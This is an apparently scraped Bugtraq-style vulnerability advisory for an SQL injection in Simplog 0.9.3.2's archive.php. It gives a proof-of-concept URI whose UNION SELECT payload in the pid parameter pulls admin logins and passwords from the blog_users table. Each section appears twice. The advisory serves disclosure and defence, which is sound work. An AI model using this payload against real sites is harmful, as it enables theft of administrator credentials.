Simplog Archive.PHP SQL Injection Vulnerability
BID:21843
Info
Simplog Archive.PHP SQL Injection Vulnerability
| Bugtraq ID: | 21843 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 02 2007 12:00AM |
| Updated: | Jan 04 2007 07:16PM |
| Credit: | Javor Ninov is credited with the discovery of this vulnerability. |
| Vulnerable: |
Simplog Simplog 0.9.3 .2 |
| Not Vulnerable: | |
Discussion
Simplog Archive.PHP SQL Injection Vulnerability
Simplog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 0.9.3.2; other versions may also be vulnerable.
NOTE: This issue was previously discussed in BID 17652 (Simplog Multiple SQL Injection Vulnerabilities) and an upgrade is available from the vendor. However, new reports indicate the latest version of the application is still vulnerable to this issue.
Simplog is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.
This issue affects version 0.9.3.2; other versions may also be vulnerable.
NOTE: This issue was previously discussed in BID 17652 (Simplog Multiple SQL Injection Vulnerabilities) and an upgrade is available from the vendor. However, new reports indicate the latest version of the application is still vulnerable to this issue.
Exploit / POC
Simplog Archive.PHP SQL Injection Vulnerability
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
Attackers can exploit these issues via a web client.
The following proof-of-concept URI is available:
http://example.com/simplog/archive.php?blogid=1&pid=1111%20union%20select%201,1,1,login,1,password,1,1%20from%20blog_users%20where%20admin=1
Solution / Fix
Simplog Archive.PHP SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].